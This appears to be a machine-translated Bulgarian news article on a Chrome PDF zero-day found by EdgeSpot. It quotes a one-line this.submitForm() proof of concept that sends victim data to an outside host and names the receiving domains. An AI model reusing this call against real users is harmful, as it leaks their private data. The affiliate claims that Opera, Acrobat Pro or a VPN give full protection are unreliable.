- EdgeSpot откри интригуваща уязвимост от нулев ден, използвайки PDF документи в Chrome.
- Това уязвимост може да ви навреди, като съберете поверителните данни на вашия компютър.
- Разгледайте нашите Страница в мрежата и облака за повече информация за други инструменти и услуги.
- Ако се интересувате от браузъри, ние предоставяме много информация за тях в нашия Център за браузъри.
Направете всичките си документи достъпни и защитени с помощта на Adobe Acrobat Reader. Този инструмент за управление на документи също ще ви позволи да се подписвате по електронен път и да създавате официални формуляри, за да спестите времето си на работа. Вземете го за вашия компютър и ще можете:
- Отворете, отпечатайте и редактирайте всичките си PDF и други типове файлове
- Попълнете PDF формулярите по-лесно
- Съхранявайте основните си документи в криптиран вид
Вземете всички приложения на специална цена!
Софтуерът за управление на документи Nr.1 в света вече е на страхотна цена, така че побързайте!
Услугата за откриване на експлойти EdgeSpot откри интригуващо Chrome нулева дневна уязвимост, използваща PDF документи.
Уязвимостта позволява на нападателите да чувствителни данни за реколтата използване на злонамерени PDF документи, отворени в Chrome.
Веднага след като жертвата отвори съответните PDF файлове в Google Chrome, злонамерена програма започва да работи във фонов режим, като събира потребителски данни.
След това данните се препращат към отдалечения сървър, който се контролира от хакерите. Може да се чудите какви данни се изсмукват от нападателите, те насочват следните данни на вашия компютър:
- IP адрес
- Пълен път на PDF файла в системата
- Версии на OS и Chrome
Пазете се от PDF файлове със злонамерен софтуер
Експерти забелязан че един от двата домейна readnotify [.] com или burpcollaborator [.] net получаваше данните.
Те разкриха, че нападателите използват this.submitForm () PDF Javascript API за събиране на поверителна информация на потребителите.
Тествахме го с минимален PoC, просто API призив this.submitForm (‘ http://google.com/test’) ще накара Google Chrome да изпраща личните данни на google.com.
Тази грешка в Chrome се използва от два различни набора злонамерени PDF файлове, и двамата циркулиращи съответно през октомври 2017 г. и септември 2018 г.
По-специално, събраните данни могат да бъдат използвани от нападателите за прецизиране на атаките в бъдеще. Отчетите предполагат, че първата партида файлове е съставена с помощта на PDF услугата за проследяване на ReadNotify.
Потребителите могат да използват услугата, за да следят потребителските изгледи. EdgeSpot не споделя никакви подробности относно естеството на втория набор от PDF файлове.
Бърз съвет: Променете браузъра си на Opera
В тези неспокойни времена на всяка стъпка ни атакуват със зловреден софтуер, фишинг и троянски коне, така че трябва да бъдем много по-бдителни и да останем защитени.
И тъй като това е проблем, специфичен за Chrome, можете да избегнете тази заплаха и всички останали с ориентиран към сигурността браузър като Опера.
Този браузър се предлага с вграден рекламен блокер, който не само изчиства подобни разсейвания, но и блокира скриптове за анализ, пиксели за проследяване и методи за събиране на вашите данни.
И ако искате да сте абсолютно сигурни, че стоите далеч от всякаква опасност, задръжте вграденото VPN услуга, която е 100% безплатна за неограничено време.
Опера
Opera предлага перфектната защита срещу заплахи с вградения блокер за реклами и VPN услугата безплатно!
Посети сайта
Как мога да остана защитен от PDF уязвимости?
Изтеглете Adobe Acrobat PRO
Adobe и Chrome се справят добре, когато става въпрос за работа с PDF файлове. С инсталирането на разширението Adobe за Chrome можете да преглеждате и манипулирате PDF файлове по ваш вкус, без да напускате любимия си браузър.
Въпреки здравата си структура, зловредният софтуер, скрит в PDF файлове, може да не бъде открит, ако използвате стандартната версия на Reader.
Препоръчва се професионалната версия, за да се гарантира вашата защита и да се пазят вашите данни далеч от хакери.
Въпреки че не е безплатна, цената, която ще платите, е доста малка за множеството допълнителни функции, на които ще се радвате, включително подобрената сигурност на вашите PDF файлове.
Включен е и 7-дневен безплатен пробен период, за да можете да опитате пълния опит на Pro, преди да направите покупката.
Adobe Acrobat PRO
Стойте далеч от зловреден софтуер, като изтеглите Adobe Acrobat PRO. Той има много повече функции от безплатната версия и поддържа данните ви в безопасност.
Посети сайта
В случай, че искате да сте сигурни, докато сърфирате в интернет, ще трябва да получите напълно специализиран инструмент за защита на вашата мрежа. Инсталирайте частния достъп до интернет сега и се подсигурете. Той предпазва вашия компютър от атаки по време на сърфиране, маскира вашия IP адрес и блокира всички нежелани достъпи.
Услугата за откриване на експлойт EdgeSpot иска да предупреди потребителите на Chrome за потенциалните рискове, тъй като не се очаква да бъде пуснат пластирът в близко бъдеще.
EdgeSpot докладва на Google за уязвимостта миналата година и компанията обеща да пусне кръпка в края на април.
Можете обаче да помислите за използване на временно решение на проблема, като локално преглеждате получените PDF документи с друго приложение за четене.
Освен това можете да отворите PDF документите си в Chrome, като изключите системите си от интернет.
често задавани въпроси
Да, така е. Но ако искате по-широк избор, разгледайте нашите най-добри снимки за Chromeповерителност разширения в това пълно ръководство.
Tтук има много разширения, които позволяват PDF файлове обработка. Проверете от нашите отличен водач за най-добрите PDF разширения за Chrome.
Не, но можете да го активирате бързо. Ето нашето изчерпателно ръководство за това как да активирате генератора на QR код в Chrome.